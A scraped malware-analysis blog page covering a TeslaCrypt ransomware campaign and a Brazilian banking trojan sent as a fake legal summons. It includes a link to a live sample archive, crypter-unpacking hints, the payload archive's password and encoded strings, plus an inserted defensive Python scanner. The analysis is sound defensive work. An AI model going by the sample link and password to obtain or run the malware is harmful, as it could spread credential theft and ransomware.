<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigFOWva3JANJY1QR-ZCzcRW6HB8vhOOkCcKm4A8QAflRD_kWwXg74K3azQPTXkyGX9D8i_XITVJCXRL1tnHRpZN4mQ-34gpaOMLVqVQ-P96vxefWEBPx9Q3zU_pLjlJ0seu-nAM05DXjo/s1600/Clipboard03-b.png" imageanchor="1"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigFOWva3JANJY1QR-ZCzcRW6HB8vhOOkCcKm4A8QAflRD_kWwXg74K3azQPTXkyGX9D8i_XITVJCXRL1tnHRpZN4mQ-34gpaOMLVqVQ-P96vxefWEBPx9Q3zU_pLjlJ0seu-nAM05DXjo/s320/Clipboard03-b.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We visit the website indicated and see the demand for payment of US$ 500 or 1.15 BTC</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhSRowhaU0PJRERb-pSbwUcxI_HM7F2t8nuxHdW3ZlRLwscht6K1M-Vhb7DyRKwM-HaahbR4LFzT3Vd4K8NG-z2V87dPg_oZsmkTcfK-yc3qYzdrLuLE1mIBwhypRltF9k7n9FzrSsRg0/s1600/p00.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhSRowhaU0PJRERb-pSbwUcxI_HM7F2t8nuxHdW3ZlRLwscht6K1M-Vhb7DyRKwM-HaahbR4LFzT3Vd4K8NG-z2V87dPg_oZsmkTcfK-yc3qYzdrLuLE1mIBwhypRltF9k7n9FzrSsRg0/s320/p00.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglrXOKxYUYNTsFhGsqOPRWg10kAoP5S_HTP5_PjEn36MT3dtXXuW3qiEWqNmqXWDarSChJCLUFCE7EkwezA6_DF0cdu6ADHLaXAe7iu_tFnHLQDrYpf0ad2FHKpMmhmUK6DhSNNuY7zoc/s1600/p01.png" imageanchor="1"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglrXOKxYUYNTsFhGsqOPRWg10kAoP5S_HTP5_PjEn36MT3dtXXuW3qiEWqNmqXWDarSChJCLUFCE7EkwezA6_DF0cdu6ADHLaXAe7iu_tFnHLQDrYpf0ad2FHKpMmhmUK6DhSNNuY7zoc/s320/p01.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpWUQGVlVNt6XvJY1sOIW2IGrBE8VBFE7LGY9jZ3OS5GwaYETd_hGBtLxzYxfZS-qxkjRal-WkACI1-nhuJFEqR916D6mre12v8pUyDmD8sh8x2z4sz0qMO0ZN3UuEW3gHCqvDYzNLPO0/s1600/p03.png" imageanchor="1"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpWUQGVlVNt6XvJY1sOIW2IGrBE8VBFE7LGY9jZ3OS5GwaYETd_hGBtLxzYxfZS-qxkjRal-WkACI1-nhuJFEqR916D6mre12v8pUyDmD8sh8x2z4sz0qMO0ZN3UuEW3gHCqvDYzNLPO0/s320/p03.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The recommendation is not to open unsolicited email, much less its attachments, and, as always, to reinforce awareness campaigns.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Samples: https://www.dropbox.com/s/qthkfjoodar7tct/TeslaCrypt-09-12-15.rar?dl=0</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
That's all for now.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
@Dkavalanche 2015</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<br />
<br /></div>
</div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com2tag:blogger.com,1999:blog-4220472203730425546.post-38070124392638456432015-06-11T05:48:00.000-07:002015-06-11T05:50:20.315-07:00<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2000007629395px;"><b><span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2000007629395px;">Fake Summons:</span><span style="line-height: 18.2000007629395px;"> </span></span></b></span><span style="color: #444444; font-family: 'Courier New', Courier, monospace; line-height: 29.9904003143311px;">Prezado(a) Cliente: Notificao de Intimacoes (10962)</span><br />
<span style="background-color: #fefdfa;"><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2000007629395px;">Today I bring you a threat that targets several Brazilian banks. It arrives as a fake summons from the </span></span></span><span style="background-color: #f5f8fa; color: #292f33; font-family: Arial, sans-serif; font-size: 16px; line-height: 22px; white-space: pre-wrap;">AASP :: Associação dos Advogados de São Paulo.</span><br />
<br />
Threat:<br />
<span style="background-color: #f5f8fa; line-height: 22px; white-space: pre-wrap;"><span style="color: #292f33; font-family: Arial, sans-serif;">http://urlquery.net/report.php?id=1433860235433</span></span><br />
<span style="background-color: #f5f8fa; line-height: 22px; white-space: pre-wrap;"><span style="color: #292f33; font-family: Arial, sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3y6Sa8vVfHMDm2UO6AER8LWibBMuh66cxX15Nu2pAY8nX7h9xyqzxbNlX0GNhwf6-pcYlNEUaBgb2lZ4NM60c-Qp9xcPyop2YrfABp8HLokhU3R0Fy86jaEg6r5k3Ek8RNGSLZP-LQc/s1600/spam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3y6Sa8vVfHMDm2UO6AER8LWibBMuh66cxX15Nu2pAY8nX7h9xyqzxbNlX0GNhwf6-pcYlNEUaBgb2lZ4NM60c-Qp9xcPyop2YrfABp8HLokhU3R0Fy86jaEg6r5k3Ek8RNGSLZP-LQc/s640/spam.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis shows an almost nonexistent detection rate: 2/57.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVgyrxA6JGk3jOC6UfuT_-wYbpMnZkreokux-d3h0vuIWk9fnlocYd8fiudqHPo_xATLia0XJryOS-U7TN-jYnPbqVtI4pREmwE6CMFoMaLgRDSaISXOpNZ8Q6L9a4P-Q8VURGCcmz9w/s1600/vt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHVgyrxA6JGk3jOC6UfuT_-wYbpMnZkreokux-d3h0vuIWk9fnlocYd8fiudqHPo_xATLia0XJryOS-U7TN-jYnPbqVtI4pREmwE6CMFoMaLgRDSaISXOpNZ8Q6L9a4P-Q8VURGCcmz9w/s320/vt.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It carries an obfuscation layer from a Visual Basic crypter, which is easily removed by setting breakpoints on IsDebuggerPresent and WriteProcessMemory and dumping the unpacked image.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The dropper downloads a second payload from another site; the URL is stored in encoded form.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZGUI1Ojo4b_CsV-8lb_CSXC1Jn3vigDT6O6bLQLCpmFreZ1vqMpAUL3gsehPTC80YaDDXJ6GRlDpksgJOiDRozAHFflZc3PR2-mNOZOGe1YS4totUyrwcfSVtXeeNMXNcNi-ydaxbb80/s1600/06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZGUI1Ojo4b_CsV-8lb_CSXC1Jn3vigDT6O6bLQLCpmFreZ1vqMpAUL3gsehPTC80YaDDXJ6GRlDpksgJOiDRozAHFflZc3PR2-mNOZOGe1YS4totUyrwcfSVtXeeNMXNcNi-ydaxbb80/s640/06.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoejmWju4spJbEYQZ9a1Rges5U9ak4R6hltevKWLZXduWWcRWHvps2XrBT0yh6RORiuf12duMGEposV_BfQz2k9oTmRFXKH6aMpo-LlZpkunrF9DNaxY1mfqOUifCqaBLG-VzqCylHS4g/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoejmWju4spJbEYQZ9a1Rges5U9ak4R6hltevKWLZXduWWcRWHvps2XrBT0yh6RORiuf12duMGEposV_BfQz2k9oTmRFXKH6aMpo-LlZpkunrF9DNaxY1mfqOUifCqaBLG-VzqCylHS4g/s640/01.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The downloaded file (.jpg) is actually a password-protected .ZIP.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoq4EsHB70zvYQHHRRAUQ_y8JJ7XQ95LQyVFXvrZfbQ9YtF7mZGdpHUU_Y34_i1fnbq42PlwwuhSjqigI2oBRWyBv3L7Zp5ruKCbfrI39Llr5WcXiu3UC0ai0APfCjToxZPh3_e09PhQM/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoq4EsHB70zvYQHHRRAUQ_y8JJ7XQ95LQyVFXvrZfbQ9YtF7mZGdpHUU_Y34_i1fnbq42PlwwuhSjqigI2oBRWyBv3L7Zp5ruKCbfrI39Llr5WcXiu3UC0ai0APfCjToxZPh3_e09PhQM/s640/03.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7Ebr-A0q_Z2SOE3tF6bZUk_V-MpWy-3xwMBAtyxSqbJXVZBtSoc9aDb2PmQ9IpDwziyaUozz0NCsLd1G5nTd10MwIegv-WW9vn8dl-4DcXI8q3C6_hZM1ioOGf10cL1lYdgLFshOci1g/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7Ebr-A0q_Z2SOE3tF6bZUk_V-MpWy-3xwMBAtyxSqbJXVZBtSoc9aDb2PmQ9IpDwziyaUozz0NCsLd1G5nTd10MwIegv-WW9vn8dl-4DcXI8q3C6_hZM1ioOGf10cL1lYdgLFshOci1g/s640/02.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Traffic</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tcCMo1w5AcX7FDeWQxfF4RZGapEgYhpG_1k00qqvyvQepWjYz_PDNSe45GuuqXTAa0kELxN-X-b2sYz9FXH451ZheRXkIP4GBCEkr2aRZmo4P4QzEpMlrPUhy-Nth_C3rFs5c-C-suE/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tcCMo1w5AcX7FDeWQxfF4RZGapEgYhpG_1k00qqvyvQepWjYz_PDNSe45GuuqXTAa0kELxN-X-b2sYz9FXH451ZheRXkIP4GBCEkr2aRZmo4P4QzEpMlrPUhy-Nth_C3rFs5c-C-suE/s640/04.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The ZIP password is obfuscated inside the binary.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">\temp.zip</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Scripting.FileSystemObject</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>102030</b></span></div>
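A defender-side check for the two findings above (a download named .jpg that is really a ZIP, and a password-protected entry inside it carrying reader.exe). This is an added example in Python, not the post's own code: the sample archive, the magic-byte table and every file name other than reader.exe are constructed here, and the encrypted flag is set by hand because the standard library cannot write encrypted ZIPs.

```python
import io
import struct
import zipfile

# Magic-byte table for the types relevant to this sample (constructed for this example).
MAGICS = {
    "jpg": b"\xff\xd8\xff",
    "zip": b"PK\x03\x04",
    "exe": b"MZ",
}
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".cpl")


def build_sample(encrypted: bool = True) -> bytes:
    """Constructed sample: a ZIP holding 'reader.exe' (the payload name from the post).

    Bit 0 of the general-purpose flag marks an entry as encrypted. It is set here
    in both the local file header (flags at +6) and the central directory record
    (flags at +8), which is what the scanner below inspects.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("reader.exe", b"MZ" + b"\x00" * 64)  # fake PE stub, not a real program
    data = bytearray(buf.getvalue())
    if encrypted:
        local = data.find(b"PK\x03\x04")
        central = data.find(b"PK\x01\x02")
        for off in (local + 6, central + 8):
            flags = struct.unpack_from("<H", data, off)[0] | 0x0001
            struct.pack_into("<H", data, off, flags)
    return bytes(data)


def sniff_type(data: bytes) -> str:
    """Identify the real file type from its leading bytes, ignoring the extension."""
    for name, magic in MAGICS.items():
        if data.startswith(magic):
            return name
    return "unknown"


def inspect_download(filename: str, data: bytes) -> dict:
    """Report a download whose extension lies about its content, as the .jpg-that-is-a-ZIP did."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = sniff_type(data)
    report = {
        "claimed": ext,
        "actual": actual,
        "mismatch": actual != "unknown" and actual != ext,
        "encrypted_entries": [],
        "executables": [],
    }
    if actual == "zip":
        # Listing entries only reads the central directory, so no password is needed
        # to see that an executable is hidden behind encryption.
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.flag_bits & 0x0001:
                    report["encrypted_entries"].append(info.filename)
                if info.filename.lower().endswith(EXECUTABLE_SUFFIXES):
                    report["executables"].append(info.filename)
    report["suspicious"] = report["mismatch"] and bool(report["executables"])
    return report


if __name__ == "__main__":
    print(inspect_download("photo.jpg", build_sample()))
```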
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">We analyze the payload (reader.exe) on VirusTotal: detection rate 3/57.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztzdAS-77FNFVfVZNwTAIsOwymMIgWu9uPHp5atGTI2XMX-jtz_ByRcsDdiVSliXcgBhAyzm9vbI8MevwY7sB_F4zXlChb5CmKHSNCzWHX8PBWeGVwkrDLJEkg8zq3AZGPld3e6ExXUg/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjztzdAS-77FNFVfVZNwTAIsOwymMIgWu9uPHp5atGTI2XMX-jtz_ByRcsDdiVSliXcgBhAyzm9vbI8MevwY7sB_F4zXlChb5CmKHSNCzWHX8PBWeGVwkrDLJEkg8zq3AZGPld3e6ExXUg/s400/vt2.jpg" width="400" /></a></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">It is obfuscated with the same crypter as the dropper.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZW9eO1M5rdh9K7IgVi7nQL7MZnvvG50yrdkKga15bHnpo0nXG2YE9YQOxQHWUWtlKU53p6YEPf2qszGn6oCaGToSci65YC-89Je3Hus2ReHPunO1mV9G90TOZRFXWF1TCijKAw69K2zs/s1600/07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZW9eO1M5rdh9K7IgVi7nQL7MZnvvG50yrdkKga15bHnpo0nXG2YE9YQOxQHWUWtlKU53p6YEPf2qszGn6oCaGToSci65YC-89Je3Hus2ReHPunO1mV9G90TOZRFXWF1TCijKAw69K2zs/s400/07.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It is a binary written in Delphi that monitors the URLs visited in the browser; when one matches an entry in its encoded list, it displays a fake form to capture the victim's banking credentials and virtual tokens.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Encoded strings in the binary.</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">233434B2B5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">050F1755E01153D252</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">353FD8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A1ADBB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">07132F46254887BE7D91B12FF3667C25A39397548A50E47AEB39</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">E46D8CE1698DD75DE4788B</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9294A1C644A3DA71FB03195C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">B444DA011C5B92A4A6</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">A7B24B919EC22530CB6FFC64</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8F9CACCA5A99DE75808EAD</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4FDC6F8D94EB0709</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1BC0B8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FF14CA013983D2012FC45EF30D4C89B91ED40A3EB04E97CF72D67BA6F670DB7AA25B82AB2ADC1ABB76FF35DF11B379BE0B57AF5BF56998C919CF0BCB64E44C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BB4BD316265491919FAA</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">03342C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">061EC41BC3085F95B35FE07EBB1DBE77D1689FA3DB1BDA73D572904C5CED55F324DA022BA95C9B39F57FB45F9033F63C86D223C863F62EA33FF521D57EDA56</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46F16D</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">778DB52CEC578E45E30F104DEA6EEF26A2598EB2CC6A8BC30642E01C0C1DA621C970AD5FE51857F4294CE10A2BA94F943DA9DD0D27BA6AFF5381BA7B9B3830</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0E1D2F4DD41653E17F8FAEC656AF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8DA7B232CE1560F07D8A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F2041F43DA2D49</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0D1D39B09FDD789FDC0DCCD867FF1227AE73D8</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">EF523265</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6AEC1BBD619532D77390B92A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">9591BF023DB22EE50E3FE779</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">82919FD253A7DD69</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">33C459</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46DE63</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">D56EFE</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">202A344B225EF52B32EB1DA44251AC59F93DE15A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">52D8659CF30C47849D5F88CF190A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7C8884E26B8CE704110C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46D46198F773E21530D375A1B417BE77EB5F</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BA4FEB036A81D40722C16BBF5486CE71EF0126CD77C6BC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0C081E5AD7195BF705</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CB5EF870DF1B4AFC28DB0D193DAD163E92A34BE262D4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">31C65F829AD62AC7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F9001A5138BB3DD460E4668BF1095883D06D91E9003EE669FE14</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0416205736B533C25EE6608DF773E61043FF261E5BED31A53DA84AF0533A</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6D8785E3649CD775</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">4AD06D84EB0C67F17F8586EB56AD3DEE6480A69EDB6CB72EA531D20B4D3C</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">54E06F8D9DD515213FDC</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">46D46198F77FD20FCA75D929C21C4FF65121372445D877F778FB1773</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">F370FC7F9FDB141915191154</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">CC6795343983C14CF716CF01</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">94A6B0C7A6DA76AC689E4986B326B86DA7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C852D2102C5E868D96A5</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C050DC1F265887</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6EF972F5056FA4B3B4BA5DAA97</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">131CCC012A5EE51CC679A7</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">7F95B414C7389B4AF42BD1</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">C6538B31E87DD70E34EB</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">82A15DFC21</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">FA0F379C5CF26197B156</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">193AE57792</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2436EC5289DD7DA856F4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">35E51CA244</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8E9CA2C757AF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">808A90D650</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6BFF1A5138B630C2412E32905FB4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">69EB718A81FF</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">BF4AD42C0375F70501036F8BA72F65</span></div>
